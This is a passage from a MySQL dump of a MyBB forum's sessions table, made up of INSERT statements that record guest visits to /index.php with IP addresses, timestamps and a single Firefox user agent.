'/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('913f0bb3ff5177bf8820a66322d3ae54', '0', '150.98.49.121', '1352771133', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('606f4224f4864be7f0f2f127dae78d58', '0', '140.38.20.49', '1352771134', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1e58b1242fcecc6cd4b3a4b07879df44', '0', '199.26.215.159', '1352771135', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ec2d6e88f63d8ce1cbb0c4cc159debc2', '0', '154.123.128.42', '1352771136', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cbb9d8cd0d9d17cc538d3c04e4670d69', '0', '74.235.4.0', '1352771141', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a93214cf0b89d226014b8e4b01672e78', '0', '168.220.102.5', '1352771143', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('75fd4483b6844e5fab26daca43385656', '0', '215.136.155.152', '1352771144', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('171e9dd0373a39ab1b35b34320c4ea46', '0', '253.233.89.150', '1352771146', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0059aaa3b41df8956687004fb35c4f07', '0', '157.132.119.215', '1352771147', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c9ba3de9b36eff39da9eab09e1a53fdd', '0', '28.77.96.91', '1352771147', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9ff14ec2319bc721d432e34dd01af928', '0', '183.67.34.16', '1352771148', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('412963398140f89915013de389f4a5b4', '0', '153.209.54.147', '1352771149', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('84217ce38688d6be002fde373f958aba', '0', '81.151.188.200', '1352771150', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a546254553728bf0889951a43cd1ea1e', '0', '9.13.68.136', '1352771151', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2bf2dcfce04007254c2b73b090991828', '0', '213.30.184.6', '1352771152', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9a99144044001cea80a26421bfd6f315', '0', '29.153.194.254', '1352771152', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6c0d61f591d8d2952c16b846383d75f9', '0', '197.68.141.69', '1352771153', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4b41422235b0c340b41df795e496c889', '0', '42.216.172.188', '1352771154', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ccbd8e36e22ed24b46feecaebc9d0106', '0', '156.138.12.134', '1352771154', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('efb15c9b6ee4e680656215938035e07d', '0', '11.36.108.76', '1352771159', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('87b5bc49995018b75081db4b2b7547fa', '0', '165.22.190.203', '1352771162', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8466c89ec4d809e07119f5d044b382d8', '0', '42.125.184.159', '1352771163', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1a185fc2ab558e0b79c40122f8259b54', '0', '135.61.87.166', '1352771164', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('aaedec786e2fc7e13e3d2550c566e8f5', '0', '86.132.88.138', '1352771165', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b64c351e78a43656625d14e247ea32f9', '0', '20.10.54.237', '1352771168', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('535442ee077aa76a9e69bd5adbf0e7cf', '0', '53.61.150.116', '1352771169', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a4a5fc1991ef2708a63d3ba6f5e48190', '0', '158.219.253.218', '1352771170', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('173d66a4619393eb4f290d9a2dcf8f0c', '0', '89.217.226.121', '1352771173', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b2d18165a054225adcf8c5cb9cc2a756', '0', '148.87.43.191', '1352771174', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8dd3958a236cc4f60358994734a3690a', '0', '140.219.60.123', '1352771175', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e42099c0c9154ddeb6268b3cf0464e31', '0', '216.29.189.121', '1352771175', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c240e48e9c62efe1b96d773d0cc29fd6', '0', '210.160.205.234', '1352771178', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1ecec3788747000ce6289d5b0caea544', '0', '165.160.227.72', '1352771179', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('550eaf463c22bcc0ebf9a3207a54b705', '0', '204.201.199.248', '1352771180', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3eb4252e1fff1d50501e2832b0f0e895', '0', '128.21.66.135', '1352771181', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('95b830ec1cd651b6a0fa26d2a9c7c5a5', '0', '55.200.192.89', '1352771181', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ae8590ce1d403fcc26f65849117a37e1', '0', '211.198.82.64', '1352771182', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9a1bf31d0ee9b2e9711fa97ce5fd4efd', '0', '175.217.201.48', '1352771183', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('13f2c668f661e57087f2a5bdb0562dc4', '0', '1.36.145.211', '1352771184', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e60cebd041d6ec97fa4d5f597c875189', '0', '133.76.191.50', '1352771187', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c64a6d35c0330510751cceab152404f7', '0', '217.246.158.209', '1352771188', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ad5f83a7447ef9b7f5f6847657b7db4b', '0', '243.71.199.37', '1352771438', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('48f7760a7ab7669487b65536573aadf0', '0', '230.69.147.252', '1352771193', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6b8a55c563e903182773717a16ad0375', '0', '178.225.36.134', '1352771224', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('87c1e2ecc7b3ff053e650658240f50f0', '0', '151.115.151.233', '1352771224', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('868572bda7981627e572fc2d125b0212', '0', '178.155.213.59', '1352771226', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b1342914841d170909a3d7a452e985c8', '0', '232.212.151.32', '1352771226', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a112526ef2095d286578fa376f0c9a10', '0', '214.45.193.5', '1352771227', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b3acbce7424feb837c773e83519c4dab', '0', '94.212.92.214', '1352771228', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bad7a67e04abb29c5164a512fbb42008', '0', '250.222.183.251', '1352771228', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('415c60488721b87a811b2e371817cccc', '0', '136.218.237.153', '1352771229', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3ec29bd3ef77a418d8b82b2027f20705', '0', '107.232.247.22', '1352771231', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2b0e7dd035875f2cc00541e7256ee707', '0', '235.119.40.255', '1352771232', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('75fee55a1af80067a31813e3ec2c8b0e', '0', '200.30.28.114', '1352771233', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7d610010aca5d43e696be204c479ffd5', '0', '215.106.153.11', '1352771234', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('49100d6b9a50a6809ef94ccbf7ef9626', '0', '230.89.157.147', '1352771234', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('27b3e7d405144ed024f4ceb1fe063e53', '0', '250.125.78.25', '1352771235', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('78550ced84ca313f260c0bcd112814d6', '0', '20.6.179.246', '1352771236', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c726582959b31ffa00ad45f259af3e52', '0', '79.244.236.141', '1352771238', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('de1e9853cf91e0bac67a8bc731c07ce9', '0', '120.195.111.76', '1352771242', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7d69e5eec1c4203b48c4409de9f5dcb5', '0', '57.93.171.69', '1352771245', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7b1cb4efc2b3d895a34d435286bd9037', '0', '166.218.111.144', '1352771245', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4aa95511c8a7475bef466465e88f0a92', '0', '222.55.78.193', '1352771246', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('906c0a0f66262447cf7f6a04ebf1483e', '0', '179.23.158.180', '1352771248', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ae4fdd29e4fceab6e9901e31294501a7', '0', '88.94.228.232', '1352771249', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f72ac4812e2aaa2960007e620eb56682', '0', '196.60.102.50', '1352771437', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ce5f1008ff2d55d132b926299e5a2376', '0', '52.82.19.183', '1352771320', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('00bf731d2c93839c9cc8181bf37657f4', '0', '253.31.225.234', '1352771286', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bf9bffb37092a502bcbae7f0f3ef0fb8', '0', '35.182.129.218', '1352771287', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ea6da48746a8761b4307eca5a0981595', '0', '102.6.222.155', '1352771288', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('523116727db6639c05bba7be6df98553', '0', '193.95.84.240', '1352771289', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5ebb9179db396116b989d00737d89195', '0', '44.163.59.237', '1352771290', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cc177e69d296bbadcb7e798d36bd17c7', '0', '18.85.78.198', '1352771291', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9b64b92329041831fd4ffffe1efdf135', '0', '112.166.208.158', '1352771291', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('823aff6952281245a892f4efb1828674', '0', '183.98.46.51', '1352771292', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7b935e4ca351bc529d18e5f84f7587f6', '0', '32.196.66.3', '1352771293', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0690a6c45fe8ad208028e07474972d59', '0', '251.159.210.138', '1352771293', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e52715aa2f7f46dd249a1312dd9d5da4', '0', '160.125.147.3', '1352771294', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c87db2ca5cd0fe1ff2782167f4aba261', '0', '70.225.59.1', '1352771295', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO 